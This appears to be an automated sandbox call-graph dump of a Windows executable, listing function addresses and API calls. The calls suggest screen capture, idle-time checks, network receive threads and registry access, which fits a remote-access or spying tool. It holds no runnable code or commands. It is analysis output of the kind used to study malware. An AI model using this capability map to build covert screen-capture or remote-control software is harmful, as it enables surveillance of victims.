432f55 53871->53881 53873->53874 53875 432f55 21 API calls 53873->53875 53878 41e240 ___scrt_fastfail 53875->53878 53876 41e2b0 ___scrt_fastfail 53876->53874 53886 4335db 53876->53886 53878->53874 53879 432f55 21 API calls 53878->53879 53879->53868 53880->53871 53882 432f63 53881->53882 53883 432f5f 53881->53883 53884 43bda0 new 21 API calls 53882->53884 53883->53876 53885 432f68 53884->53885 53885->53876 53889 4334fa 53886->53889 53888 4335e3 53888->53874 53890 433513 53889->53890 53893 433509 53889->53893 53891 432f55 21 API calls 53890->53891 53890->53893 53892 433534 53891->53892 53892->53893 53895 4338c8 CryptAcquireContextA 53892->53895 53893->53888 53896 4338e9 CryptGenRandom 53895->53896 53897 4338e4 53895->53897 53896->53897 53898 4338fe CryptReleaseContext 53896->53898 53897->53893 53898->53897 53899 426c6d 53905 426d42 recv 53899->53905 53906 4161ee 53907 401e65 22 API calls 53906->53907 53908 4161f9 53907->53908 53950 43bb2c 53908->53950 53911 401e65 22 API calls 53912 416214 53911->53912 53913 4020f6 28 API calls 53912->53913 53914 41621e 53913->53914 53915 416265 53914->53915 53916 416236 53914->53916 53918 401e65 22 API calls 53915->53918 53917 401e65 22 API calls 53916->53917 53919 41623b 53917->53919 53920 41626a 53918->53920 53921 4020f6 28 API calls 53919->53921 53922 4020f6 28 API calls 53920->53922 53923 416246 53921->53923 53924 416275 53922->53924 53926 4020f6 28 API calls 53923->53926 53925 4020f6 28 API calls 53924->53925 53927 416284 53925->53927 53928 416255 53926->53928 53929 4187aa 147 API calls 53927->53929 53954 4187aa 53928->53954 53931 416261 53929->53931 53932 401e65 22 API calls 53931->53932 53933 41629e 53932->53933 53934 43bb2c _strftime 40 API calls 53933->53934 53935 4162ab 53934->53935 53936 401e65 22 API calls 53935->53936 53937 4162c0 53936->53937 53938 43bb2c _strftime 40 API calls 53937->53938 53939 4162cd 53938->53939 54015 418977 102 API calls 53939->54015 53941 4162d6 53942 4170c4 53941->53942 53943 401fd8 11 API calls 53941->53943 53944 401e8d 11 API calls 53942->53944 53943->53942 53945 4170cd 53944->53945 53946 401fd8 11 API calls 53945->53946 53947 4170d9 53946->53947 53948 401fd8 11 API calls 53947->53948 53949 4170e5 53948->53949 53951 43bb45 _strftime 53950->53951 54016 43ae83 53951->54016 53953 416206 53953->53911 54086 401fc0 53954->54086 53957 401fc0 28 API calls 53958 4187db 53957->53958 53959 418800 ___scrt_fastfail 53958->53959 53960 4187f1 GdiplusStartup 53958->53960 54090 4194ff 53959->54090 53960->53959 53965 401f09 11 API calls 53966 41883e 53965->53966 53967 41884b 53966->53967 53968 404e26 99 API calls 53966->53968 54110 418e83 DeleteDC 53967->54110 53968->53967 53970 418850 53971 40482d 3 API calls 53970->53971 53972 418857 53971->53972 53973 41885b 53972->53973 53974 4048c8 97 API calls 53972->53974 53976 404e26 99 API calls 53973->53976 53975 418867 53974->53975 53975->53973 53978 418877 53975->53978 53977 418872 53976->53977 53981 401fd8 11 API calls 53977->53981 54111 404be5 CreateThread 53978->54111 53980 418881 53984 418899 53980->53984 53985 41891c 53980->53985 53982 41895f 53981->53982 53983 401fd8 11 API calls 53982->53983 53986 41896b 53983->53986 54112 41bd4f 28 API calls 53984->54112 53988 402f31 28 API calls 53985->53988 53986->53931 53990 418934 53988->53990 53989 4188a0 54113 41bc1f 53989->54113 53991 402f10 28 API calls 53990->53991 53993 41893e 53991->53993 53995 404aa1 61 API calls 53993->53995 54014 41891a 53995->54014 53996 402f31 28 API calls 53997 4188c8 53996->53997 53998 402ea1 28 API calls 53997->53998 54000 4188d4 53998->54000 53999 401fd8 11 API calls 53999->53977 54001 402f10 28 API calls 54000->54001 54002 4188e0 54001->54002 54003 402ea1 28 API calls 54002->54003 54004 4188ea 54003->54004 54005 404aa1 61 API calls 54004->54005 54006 4188f4 54005->54006 54007 401fd8 11 API calls 54006->54007 54008 4188ff 54007->54008 54009 401fd8 11 API calls 54008->54009 54010 418908 54009->54010 54011 401fd8 11 API calls 54010->54011 54012 418911 54011->54012 54013 401fd8 11 API calls 54012->54013 54013->54014 54014->53999 54015->53941 54032 43ba8a 54016->54032 54018 43aed0 54038 43a837 54018->54038 54019 43ae95 54019->54018 54020 43aeaa 54019->54020 54031 43aeaf ___std_exception_copy 54019->54031 54037 44062d 20 API calls _abort 54020->54037 54024 43aedc 54025 43af0b 54024->54025 54046 43bacf 40 API calls __Toupper 54024->54046 54028 43af77 54025->54028 54047 43ba36 20 API calls 2 library calls 54025->54047 54048 43ba36 20 API calls 2 library calls 54028->54048 54029 43b03e _strftime 54029->54031 54049 44062d 20 API calls _abort 54029->54049 54031->53953 54033 43baa2 54032->54033 54034 43ba8f 54032->54034 54033->54019 54050 44062d 20 API calls _abort 54034->54050 54036 43ba94 ___std_exception_copy 54036->54019 54037->54031 54039 43a854 54038->54039 54040 43a84a 54038->54040 54039->54040 54051 448295 GetLastError 54039->54051 54040->54024 54042 43a875 54072 4483e4 36 API calls __Toupper 54042->54072 54044 43a88e 54073 448411 36 API calls __fassign 54044->54073 54046->54024 54047->54028 54048->54029 54049->54031 54050->54036 54052 4482b7 54051->54052 54053 4482ab 54051->54053 54075 445b74 20 API calls 3 library calls 54052->54075 54074 44883c 11 API calls 2 library calls 54053->54074 54056 4482b1 54056->54052 54058 448300 SetLastError 54056->54058 54057 4482c3 54059 4482cb 54057->54059 54082 448892 11 API calls 2 library calls 54057->54082 54058->54042 54076 446802 54059->54076 54061 4482e0 54061->54059 54064 4482e7 54061->54064 54063 4482d1 54065 44830c SetLastError 54063->54065 54083 448107 20 API calls _abort 54064->54083 54084 446175 36 API calls 4 library calls 54065->54084 54067 4482f2 54069 446802 _free 20 API calls 54067->54069 54071 4482f9 54069->54071 54070 448318 54071->54058 54071->54065 54072->54044 54073->54040 54074->54056 54075->54057 54077 44680d HeapFree 54076->54077 54078 446836 _free 54076->54078 54077->54078 54079 446822 54077->54079 54078->54063 54085 44062d 20 API calls _abort 54079->54085 54081 446828 GetLastError 54081->54078 54082->54061 54083->54067 54084->54070 54085->54081 54087 401fd2 54086->54087 54088 401fc9 54086->54088 54087->53957 54118 4025e0 28 API calls 54088->54118 54119 401f86 54090->54119 54093 4195f1 EnumDisplayDevicesW 54094 418828 54093->54094 54095 419542 EnumDisplayDevicesW 54093->54095 54101 401f13 54094->54101 54096 41956a 54095->54096 54096->54093 54097 40417e 28 API calls 54096->54097 54099 401f09 11 API calls 54096->54099 54100 4195be EnumDisplayDevicesW 54096->54100 54123 403014 54096->54123 54097->54096 54099->54096 54100->54096 54102 401f22 54101->54102 54109 401f6a 54101->54109 54103 402252 11 API calls 54102->54103 54104 401f2b 54103->54104 54105 401f6d 54104->54105 54107 401f46 54104->54107 54106 402336 11 API calls 54105->54106 54106->54109 54164 40305c 28 API calls 54107->54164 54109->53965 54110->53970 54111->53980 54165 404c01 54111->54165 54112->53989 54380 441ed1 54113->54380 54116 402093 28 API calls 54117 4188bb 54116->54117 54117->53996 54118->54087 54120 401f8e 54119->54120 54121 402252 11 API calls 54120->54121 54122 401f99 EnumDisplayMonitors 54121->54122 54122->54093 54128 403222 54123->54128 54125 403022 54132 403262 54125->54132 54129 40322e 54128->54129 54138 403618 54129->54138 54131 40323b 54131->54125 54133 40326e 54132->54133 54134 402252 11 API calls 54133->54134 54135 403288 54134->54135 54160 402336 54135->54160 54139 403626 54138->54139 54140 403644 54139->54140 54141 40362c 54139->54141 54143 40365c 54140->54143 54144 40369e 54140->54144 54149 4036a6 54141->54149 54147 4027e6 28 API calls 54143->54147 54148 403642 54143->54148 54158 4028a4 22 API calls 54144->54158 54147->54148 54148->54131 54150 402888 22 API calls 54149->54150 54151 4036b9 54150->54151 54152 40372c 54151->54152 54153 4036de 54151->54153 54159 4028a4 22 API calls 54152->54159 54156 4027e6 28 API calls 54153->54156 54157 4036f0 54153->54157 54156->54157 54157->54148 54161 402347 54160->54161 54162 402252 11 API calls 54161->54162 54163 4023c7 54162->54163 54163->54096 54164->54109 54168 404c10 54165->54168 54169 4020df 11 API calls 54168->54169 54170 404c27 54169->54170 54171 4020df 11 API calls 54170->54171 54178 404c30 54171->54178 54172 43bda0 new 21 API calls 54172->54178 54174 4020b7 28 API calls 54174->54178 54175 404ca1 54177 404e26 99 API calls 54175->54177 54180 404ca8 54177->54180 54178->54172 54178->54174 54178->54175 54179 401fd8 11 API calls 54178->54179 54186 404b96 54178->54186 54192 401fe2 54178->54192 54201 404cc3 54178->54201 54179->54178 54181 401fd8 11 API calls 54180->54181 54182 404cb1 54181->54182 54183 401fd8 11 API calls 54182->54183 54184 404c0f 54183->54184 54187 404ba0 WaitForSingleObject 54186->54187 54188 404bcd recv 54186->54188 54213 421107 54 API calls 54187->54213 54190 404be0 54188->54190 54190->54178 54191 404bbc SetEvent 54191->54190 54193 401ff1 54192->54193 54194 402039 54192->54194 54195 4023ce 11 API calls 54193->54195 54194->54178 54196 401ffa 54195->54196 54197 40203c 54196->54197 54199 402015 54196->54199 54198 40267a 11 API calls 54197->54198 54198->54194 54214 403098 28 API calls 54199->54214 54202 4020df 11 API calls 54201->54202 54212 404cde 54202->54212 54203 404e13 54204 401fd8 11 API calls 54203->54204 54205 404e1c 54204->54205 54205->54178 54206 4041a2 28 API calls 54206->54212 54207 401fe2 28 API calls 54207->54212 54208 401fd8 11 API calls 54208->54212 54209 4020f6 28 API calls 54209->54212 54210 401fc0 28 API calls 54211 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 54210->54211 54211->54212 54215 415b25 54211->54215 54212->54203 54212->54206 54212->54207 54212->54208 54212->54209 54212->54210 54213->54191 54214->54194 54216 4020f6 28 API calls 54215->54216 54217 415b47 SetEvent 54216->54217 54218 415b5c 54217->54218 54294 4041a2 54218->54294 54221 4020f6 28 API calls 54222 415b86 54221->54222 54223 4020f6 28 API calls 54222->54223 54224 415b98 54223->54224 54297 41beac 54224->54297 54227 415bc1 GetTickCount 54230 41bc1f 28 API calls 54227->54230 54228 415d20 54292 415d11 54228->54292 54293 415d34 54228->54293 54229 401e8d 11 API calls 54231 4170cd 54229->54231 54232 415bd2 54230->54232 54234 401fd8 11 API calls 54231->54234 54319 41bb77 GetLastInputInfo GetTickCount 54232->54319 54236 4170d9 54234->54236 54238 401fd8 11 API calls 54236->54238 54237 415bde 54240 41bc1f 28 API calls 54237->54240 54239 4170e5 54238->54239 54241 415be9 54240->54241 54242 41bb27 30 API calls 54241->54242 54243 415bf7 54242->54243 54244 41bdaf 28 API calls 54243->54244 54245 415c05 54244->54245 54246 401e65 22 API calls 54245->54246 54247 415c13 54246->54247 54248 402f31 28 API calls 54247->54248 54249 415c21 54248->54249 54250 402ea1 28 API calls 54249->54250 54251 415c30 54250->54251 54252 402f10 28 API calls 54251->54252 54253 415c3f 54252->54253 54254 402ea1 28 API calls 54253->54254 54255 415c4e 54254->54255 54256 402f10 28 API calls 54255->54256 54257 415c5a 54256->54257 54258 402ea1 28 API calls 54257->54258 54259 415c64 54258->54259 54260 404aa1 61 API calls 54259->54260 54261 415c73 54260->54261 54262 401fd8 11 API calls 54261->54262 54263 415c7c 54262->54263 54264 401fd8 11 API calls 54263->54264 54265 415c88 54264->54265 54266 401fd8 11 API calls 54265->54266 54267 415c94 54266->54267 54268 401fd8 11 API calls 54267->54268 54269 415ca0 54268->54269 54270 401fd8 11 API calls 54269->54270 54271 415cac 54270->54271 54272 401fd8 11 API calls 54271->54272 54273 415cb8 54272->54273 54274 401f09 11 API calls 54273->54274 54275 415cc1 54274->54275 54276 401fd8 11 API calls 54275->54276 54277 415cca 54276->54277 54278 401fd8 11 API calls 54277->54278 54279 415cd3 54278->54279 54280 401e65 22 API calls 54279->54280 54281 415cde 54280->54281 54282 43bb2c _strftime 40 API calls 54281->54282 54283 415ceb 54282->54283 54284 415cf0 54283->54284 54285 415d16 54283->54285 54287 415d09 54284->54287 54288 415cfe 54284->54288 54286 401e65 22 API calls 54285->54286 54286->54228 54321 404f51 54287->54321 54320 404ff4 82 API calls 54288->54320 54291 415d04 54291->54292 54292->54229 54336 4050e4 84 API calls 54293->54336 54337 40423a 54294->54337 54298 4020df 11 API calls 54297->54298 54318 41bebf 54298->54318 54299 41bf2f 54300 401fd8 11 API calls 54299->54300 54301 41bf61 54300->54301 54303 401fd8 11 API calls 54301->54303 54302 41bf31 54304 4041a2 28 API calls 54302->54304 54306 41bf69 54303->54306 54307 41bf3d 54304->54307 54305 4041a2 28 API calls 54305->54318 54308 401fd8 11 API calls 54306->54308 54309 401fe2 28 API calls 54307->54309 54311 415ba1 54308->54311 54312 41bf46 54309->54312 54310 401fe2 28 API calls 54310->54318 54311->54227 54311->54228 54311->54292 54313 401fd8 11 API calls 54312->54313 54315 41bf4e 54313->54315 54314 401fd8 11 API calls 54314->54318 54316 41cec5 28 API calls 54315->54316 54316->54299 54318->54299 54318->54302 54318->54305 54318->54310 54318->54314 54343 41cec5 54318->54343 54319->54237 54320->54291 54322 404f65 54321->54322 54323 404fea 54321->54323 54324 404f6e 54322->54324 54325 404fc0 CreateEventA CreateThread 54322->54325 54326 404f7d GetLocalTime 54322->54326 54323->54292 54324->54325 54325->54323 54376 405150 54325->54376 54327 41bc1f 28 API calls 54326->54327 54328 404f91 54327->54328 54375 4052fd 28 API calls 54328->54375 54336->54291 54338 404243 54337->54338 54339 4023ce 11 API calls 54338->54339 54340 40424e 54339->54340 54341 402569 28 API calls 54340->54341 54342 4041b5 54341->54342 54342->54221 54344 41ced2 54343->54344 54345 41cf31 54344->54345 54349 41cee2 54344->54349 54346 41cf4b 54345->54346 54347 41d071 28 API calls 54345->54347 54363 41d1d7 28 API calls 54346->54363 54347->54346 54350 41cf1a 54349->54350 54354 41d071 54349->54354 54362 41d1d7 28 API calls 54350->54362 54353 41cf2d 54353->54318 54356 41d079 54354->54356 54355 41d0ab 54355->54350 54356->54355 54357 41d0af 54356->54357 54360 41d093 54356->54360 54374 402725 22 API calls 54357->54374 54364 41d0e2 54360->54364 54362->54353 54363->54353 54365 41d0ec __EH_prolog 54364->54365 54366 402717 22 API calls 54365->54366 54367 41d0ff 54366->54367 54368 41d1ee 11 API calls 54367->54368 54369 41d125 54368->54369 54370 41d15d 54369->54370 54371 402730 11 API calls 54369->54371 54370->54355 54372 41d144 54371->54372 54373 402712 11 API calls 54372->54373 54373->54370 54379 40515c 102 API calls 54376->54379 54378 405159 54379->54378 54381 441edd 54380->54381 54384 441ccd 54381->54384 54383 41bc43 54383->54116 54385 441ce4 54384->54385 54387 441d1b ___std_exception_copy 54385->54387 54388 44062d 20 API calls _abort 54385->54388 54387->54383 54388->54387 54389 418eb1 CreateDCA CreateCompatibleDC 54438 419360 54389->54438 54391 418eec 54393 418f13 54391->54393 54443 4193a2 GetMonitorInfoW 54391->54443 54394 418f71 54393->54394 54441 4193d8 GetMonitorInfoW 54393->54441 54395 402093 28 API calls 54394->54395 54437 418f7d 54395->54437 54398 418f8a SelectObject 54401 418fa5 StretchBlt 54398->54401 54402 418f96 DeleteDC DeleteDC 54398->54402 54399 418f5e DeleteDC DeleteDC 54400 418f6b DeleteObject 54399->54400 54400->54394 54401->54402 54403 418fce 54401->54403 54402->54400 54405 418fd5 GetCursorInfo 54403->54405 54406 41904f 54403->54406 54405->54406 54407 418fec GetIconInfo 54405->54407 54408 419099 GetObjectA 54406->54408 54410 419062 BitBlt 54406->54410 54411 419089 54406->54411 54407->54406 54409 419002 DeleteObject DeleteObject DrawIcon 54407->54409 54408->54402 54413 4190b1 LocalAlloc 54408->54413 54409->54406 54410->54408 54411->54408 54414 419154 GlobalAlloc 54413->54414 54415 41914a 54413->54415 54414->54402 54416 419196 GetDIBits 54414->54416 54415->54414 54417 4191d3 54416->54417 54418 4191ad DeleteDC DeleteDC DeleteObject GlobalFree 54416->54418 54419 4020df 11 API calls 54417->54419 54418->54394 54420 41920f 54419->54420 54421 4020df 11 API calls 54420->54421 54422 41921b 54421->54422 54423 40250a 28 API calls 54422->54423 54424 41922b 54423->54424 54425 40250a 28 API calls 54424->54425 54426 419248 54425->54426 54427 40250a 28 API calls 54426->54427 54428 41926a 54427->54428 54429 41927b DeleteObject GlobalFree DeleteDC 54428->54429 54430 4192a0 54429->54430 54431 41929d DeleteDC 54429->54431 54432 402055 11 API calls 54430->54432 54431->54430 54433 4192af 54432->54433 54434 401fd8 11 API calls 54433->54434 54435 4192bb 54434->54435 54436 401fd8 11 API calls 54435->54436 54436->54437 54439 436f10 ___scrt_fastfail 54438->54439 54440 41937e EnumDisplaySettingsW 54439->54440 54440->54391 54442 418f48 CreateCompatibleBitmap 54441->54442 54442->54398 54442->54399 54443->54393 54444 426a77 54445 426a8c 54444->54445 54457 426b1e 54444->54457 54446 426b83 54445->54446 54447 426bae 54445->54447 54450 426b0e 54445->54450 54454 426b4e 54445->54454 54456 426ad9 54445->54456 54445->54457 54458 426bd5 54445->54458 54472 424f6e 49 API calls _Yarn 54445->54472 54446->54447 54476 425781 21 API calls 54446->54476 54447->54457 54447->54458 54460 425b72 54447->54460 54450->54454 54450->54457 54474 424f6e 49 API calls _Yarn 54450->54474 54454->54446 54454->54457 54475 41fbfd 52 API calls 54454->54475 54456->54450 54456->54457 54473 41fbfd 52 API calls 54456->54473 54458->54457 54477 4261e6 28 API calls 54458->54477 54461 425b91 ___scrt_fastfail 54460->54461 54463 425ba0 54461->54463 54467 425bc5 54461->54467 54478 41ec4c 21 API calls 54461->54478 54463->54467 54471 425ba5 54463->54471 54479 420669 46 API calls 54463->54479 54466 425bae 54466->54467 54481 424d96 21 API calls 2 library calls 54466->54481 54467->54458 54469 425c48 54469->54467 54470 432f55 21 API calls 54469->54470 54470->54471 54471->54466 54471->54467 54480 41daf0 49 API calls 54471->54480 54472->54456 54473->54456 54474->54454 54475->54454 54476->54447 54477->54457 54478->54463 54479->54469 54480->54466 54481->54467 54482 4165db 54483 401e65 22 API calls 54482->54483 54484 4165eb 54483->54484 54485 4020f6 28 API calls 54484->54485 54486 4165f6 54485->54486 54487 401e65 22 API calls 54486->54487 54488 416601 54487->54488 54489 4020f6 28 API calls 54488->54489 54490 41660c 54489->54490 54493 412965 54490->54493 54494 40482d 3 API calls 54493->54494 54495 412979 54494->54495 54496 4048c8 97 API calls 54495->54496 54497 412981 54496->54497 54498 402f31 28 API calls 54497->54498 54499 41299a 54498->54499 54500 402f10 28 API calls 54499->54500 54501 4129a4 54500->54501 54502 404aa1 61 API calls 54501->54502 54503 4129ae 54502->54503 54504 401fd8 11 API calls 54503->54504 54505 4129b6 54504->54505 54506 404c10 130 API calls 54505->54506 54507 4129c4 54506->54507 54508 401fd8 11 API calls 54507->54508 54509 4129cc 54508->54509 54510 401fd8 11 API calls 54509->54510 54511 4129d4 54510->54511 54512 44839e 54520 448790 54512->54520 54515 4483b2 54517 4483ba 54518 4483c7 54517->54518 54528 4483ca 11 API calls 54517->54528 54521 44854a _abort 5 API calls 54520->54521 54522 4487b7 54521->54522 54523 4487cf TlsAlloc 54522->54523 54524 4487c0 54522->54524 54523->54524 54525 43502b TranslatorGuardHandler 5 API calls 54524->54525 54526 4483a8 54525->54526 54526->54515 54527 448319 20 API calls 3 library calls 54526->54527 54527->54517 54528->54515 54529 100020db 54531 100020e7 ___DestructExceptionObject 54529->54531 54530 10002110 dllmain_raw 54532 100020f6 54530->54532 54533 1000212a 54530->54533 54531->54530 54531->54532 54537 1000210b 54531->54537 54542 10001eec 54533->54542 54535 10002177 54535->54532 54536 10001eec 29 API calls 54535->54536 54538 1000218a 54536->54538 54537->54532 54537->54535 54539 10001eec 29 API calls 54537->54539 54538->54532 54540 10002193 dllmain_raw 54538->54540 54541 1000216d dllmain_raw 54539->54541 54540->54532 54541->54535 54543 10001ef7 54542->54543 54544 10001f2a dllmain_crt_process_detach 54542->54544 54545 10001f1c dllmain_crt_process_attach 54543->54545 54546 10001efc 54543->54546 54551 10001f06 54544->54551 54545->54551 54547 10001f01 54546->54547 54548 10001f12 54546->54548 54547->54551 54552 1000240b 25 API calls 54547->54552 54553 100023ec 27 API calls 54548->54553 54551->54537 54552->54551 54553->54551 54554 434918 54555 434924 ___BuildCatchObject 54554->54555 54581 434627 54555->54581 54557 43492b 54559 434954 54557->54559 54887 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 54557->54887 54568 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54559->54568 54592 4442d2 54559->54592 54563 434973 ___BuildCatchObject 54564 4349f3 54600 434ba5 54564->54600 54568->54564 54888 443487 36 API calls 5 library calls 54568->54888 54582 434630 54581->54582 54893 434cb6 IsProcessorFeaturePresent 54582->54893 54584 43463c 54894 438fb1 54584->54894 54586 434641 54587 434645 54586->54587 54903 44415f 54586->54903 54587->54557 54590 43465c 54590->54557 54594 4442e9 54592->54594 54593 43502b TranslatorGuardHandler 5 API calls 54595 43496d 54593->54595 54594->54593 54595->54563 54596 444276 54595->54596 54597 4442a5 54596->54597 54598 43502b TranslatorGuardHandler 5 API calls 54597->54598 54599 4442ce 54598->54599 54599->54568 54601 436f10 ___scrt_fastfail 54600->54601 54602 434bb8 GetStartupInfoW 54601->54602 54603 4349f9 54602->54603 54604 444223 54603->54604 54953 44f0d9 54604->54953 54606 44422c 54608 434a02 54606->54608 54957 446895 36 API calls 54606->54957 54609 40ea00 54608->54609 55087 41cbe1 LoadLibraryA GetProcAddress 54609->55087 54611 40ea1c GetModuleFileNameW 55092 40f3fe 54611->55092 54613 40ea38 54614 4020f6 28 API calls 54613->54614 54615 40ea47 54614->54615 54616 4020f6 28 API calls 54615->54616 54617 40ea56 54616->54617 54618 41beac 28 API calls 54617->54618 54619 40ea5f 54618->54619 55107 40fb52 54619->55107 54621 40ea68 54622 401e8d 11 API calls 54621->54622 54623 40ea71 54622->54623 54624 40ea84 54623->54624 54625 40eace 54623->54625 55292 40fbee 118 API calls 54624->55292 54627 401e65 22 API calls 54625->54627 54629 40eade 54627->54629 54628 40ea96 54630 401e65 22 API calls 54628->54630 54632 401e65 22 API calls 54629->54632 54631 40eaa2 54630->54631 55293 410f72 36 API calls __EH_prolog 54631->55293 54633 40eafd 54632->54633 54634 40531e 28 API calls 54633->54634 54636 40eb0c 54634->54636 54638 406383 28 API calls 54636->54638 54637 40eab4 55294 40fb9f 78 API calls 54637->55294 54640 40eb18 54638->54640 54642 401fe2 28 API calls 54640->54642 54641 40eabd 55295 40f3eb 71 API calls 54641->55295 54644 40eb24 54642->54644 54645 401fd8 11 API calls 54644->54645 54646 40eb2d 54645->54646 54648 401fd8 11 API calls 54646->54648 54650 40eb36 54648->54650 54651 401e65 22 API calls 54650->54651 54652 40eb3f 54651->54652 54653 401fc0 28 API calls 54652->54653 54654 40eb4a 54653->54654 54655 401e65 22 API calls 54654->54655 54656 40eb63 54655->54656 54657 401e65 22 API calls 54656->54657 54658 40eb7e 54657->54658 54659 40ebe9 54658->54659 55296 406c59 54658->55296 54660 401e65 22 API calls 54659->54660 54666 40ebf6 54660->54666 54662 40ebab 54663 401fe2 28 API calls 54662->54663 54664 40ebb7 54663->54664 54665 401fd8 11 API calls 54664->54665 54668 40ebc0 54665->54668 54667 40ec3d 54666->54667 54672 413584 3 API calls 54666->54672 55111 40d0a4 54667->55111 55301 413584 RegOpenKeyExA 54668->55301 54678 40ec21 54672->54678 54676 40f38a 55394 4139e4 30 API calls 54676->55394 54678->54667 55304 4139e4 30 API calls 54678->55304 54686 40f3a0 55395 4124b0 65 API calls ___scrt_fastfail 54686->55395 54887->54557 54888->54564 54893->54584 54895 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54894->54895 54907 43a4ba 54895->54907 54898 438fc4 54898->54586 54900 438fcc 54901 438fd7 54900->54901 54921 43a4f6 DeleteCriticalSection 54900->54921 54901->54586 54949 44fbe8 54903->54949 54906 438fda 8 API calls 3 library calls 54906->54587 54908 43a4c3 54907->54908 54910 43a4ec 54908->54910 54912 438fc0 54908->54912 54922 438eff 54908->54922 54927 43a4f6 DeleteCriticalSection 54910->54927 54912->54898 54913 43a46c 54912->54913 54942 438e14 54913->54942 54915 43a476 54916 43a481 54915->54916 54947 438ec2 6 API calls try_get_function 54915->54947 54916->54900 54918 43a48f 54919 43a49c 54918->54919 54948 43a49f 6 API calls ___vcrt_FlsFree 54918->54948 54919->54900 54921->54898 54928 438cf3 54922->54928 54925 438f36 InitializeCriticalSectionAndSpinCount 54926 438f22 54925->54926 54926->54908 54927->54912 54929 438d23 54928->54929 54930 438d27 54928->54930 54929->54930 54932 438d47 54929->54932 54935 438d93 54929->54935 54930->54925 54930->54926 54932->54930 54933 438d53 GetProcAddress 54932->54933 54934 438d63 __crt_fast_encode_pointer 54933->54934 54934->54930 54936 438dbb LoadLibraryExW 54935->54936 54941 438db0 54935->54941 54937 438dd7 GetLastError 54936->54937 54940 438def 54936->54940 54938 438de2 LoadLibraryExW 54937->54938 54937->54940 54938->54940 54939 438e06 FreeLibrary 54939->54941 54940->54939 54940->54941 54941->54929 54943 438cf3 try_get_function 5 API calls 54942->54943 54944 438e2e 54943->54944 54945 438e37 54944->54945 54946 438e46 TlsAlloc 54944->54946 54945->54915 54947->54918 54948->54916 54952 44fc01 54949->54952 54950 43502b TranslatorGuardHandler 5 API calls 54951 43464e 54950->54951 54951->54590 54951->54906 54952->54950 54954 44f0eb 54953->54954 54955 44f0e2 54953->54955 54954->54606 54958 44efd8 54955->54958 54957->54606 54959 448295 IsInExceptionSpec 36 API calls 54958->54959 54960 44efe5 54959->54960 54978 44f0f7 54960->54978 54962 44efed 54987 44ed6c 54962->54987 54965 44f004 54965->54954 54968 44f047 54971 446802 _free 20 API calls 54968->54971 54971->54965 54972 44f042 55011 44062d 20 API calls _abort 54972->55011 54974 44f08b 54974->54968 55012 44ec42 20 API calls 54974->55012 54975 44f05f 54975->54974 54976 446802 _free 20 API calls 54975->54976 54976->54974 54979 44f103 ___BuildCatchObject 54978->54979 54980 448295 IsInExceptionSpec 36 API calls 54979->54980 54985 44f10d 54980->54985 54982 44f191 ___BuildCatchObject 54982->54962 54985->54982 54986 446802 _free 20 API calls 54985->54986 55013 446175 36 API calls 4 library calls 54985->55013 55014 445909 EnterCriticalSection 54985->55014 55015 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54985->55015 54986->54985 54988 43a837 __fassign 36 API calls 54987->54988 54989 44ed7e 54988->54989 54990 44ed8d GetOEMCP 54989->54990 54991 44ed9f 54989->54991 54993 44edb6 54990->54993 54992 44eda4 GetACP 54991->54992 54991->54993 54992->54993 54993->54965 54994 4461b8 54993->54994 54995 4461f6 54994->54995 54996 4461c6 __Getctype 54994->54996 55017 44062d 20 API calls _abort 54995->55017 54996->54995 54997 4461e1 RtlAllocateHeap 54996->54997 55016 443001 7 API calls 2 library calls 54996->55016 54997->54996 54999 4461f4 54997->54999 54999->54968 55001 44f199 54999->55001 55002 44ed6c 38 API calls 55001->55002 55003 44f1b8 55002->55003 55005 44f209 IsValidCodePage 55003->55005 55008 44f1bf 55003->55008 55010 44f22e ___scrt_fastfail 55003->55010 55004 43502b TranslatorGuardHandler 5 API calls 55006 44f03a 55004->55006 55007 44f21b GetCPInfo 55005->55007 55005->55008 55006->54972 55006->54975 55007->55008 55007->55010 55008->55004 55018 44ee44 GetCPInfo 55010->55018 55011->54968 55012->54968 55013->54985 55014->54985 55015->54985 55016->54996 55017->54999 55019 44ef28 55018->55019 55020 44ee7e 55018->55020 55023 43502b TranslatorGuardHandler 5 API calls 55019->55023 55028 4511ac 55020->55028 55025 44efd4 55023->55025 55025->55008 55027 44aee6 _swprintf 41 API calls 55027->55019 55029 43a837 __fassign 36 API calls 55028->55029 55030 4511cc MultiByteToWideChar 55029->55030 55032 45120a 55030->55032 55033 4512a2 55030->55033 55035 45122b __alloca_probe_16 ___scrt_fastfail 55032->55035 55036 4461b8 ___crtLCMapStringA 21 API calls 55032->55036 55034 43502b TranslatorGuardHandler 5 API calls 55033->55034 55037 44eedf 55034->55037 55038 45129c 55035->55038 55040 451270 MultiByteToWideChar 55035->55040 55036->55035 55042 44aee6 55037->55042 55047 435ecd 20 API calls _free 55038->55047 55040->55038 55041 45128c GetStringTypeW 55040->55041 55041->55038 55043 43a837 __fassign 36 API calls 55042->55043 55044 44aef9 55043->55044 55048 44acc9 55044->55048 55047->55033 55049 44ace4 ___crtLCMapStringA 55048->55049 55050 44ad0a MultiByteToWideChar 55049->55050 55051 44ad34 55050->55051 55052 44aebe 55050->55052 55056 4461b8 ___crtLCMapStringA 21 API calls 55051->55056 55058 44ad55 __alloca_probe_16 55051->55058 55053 43502b TranslatorGuardHandler 5 API calls 55052->55053 55054 44aed1 55053->55054 55054->55027 55055 44ad9e MultiByteToWideChar 55057 44adb7 55055->55057 55070 44ae0a 55055->55070 55056->55058 55075 448c33 55057->55075 55058->55055 55058->55070 55062 44ade1 55066 448c33 _strftime 11 API calls 55062->55066 55062->55070 55063 44ae19 55064 4461b8 ___crtLCMapStringA 21 API calls 55063->55064 55069 44ae3a __alloca_probe_16 55063->55069 55064->55069 55065 44aeaf 55083 435ecd 20 API calls _free 55065->55083 55066->55070 55068 448c33 _strftime 11 API calls 55071 44ae8e 55068->55071 55069->55065 55069->55068 55084 435ecd 20 API calls _free 55070->55084 55071->55065 55072 44ae9d WideCharToMultiByte 55071->55072 55072->55065 55073 44aedd 55072->55073 55085 435ecd 20 API calls _free 55073->55085 55076 44854a _abort 5 API calls 55075->55076 55077 448c5a 55076->55077 55080 448c63 55077->55080 55086 448cbb 10 API calls 3 library calls 55077->55086 55079 448ca3 LCMapStringW 55079->55080 55081 43502b TranslatorGuardHandler 5 API calls 55080->55081 55082 448cb5 55081->55082 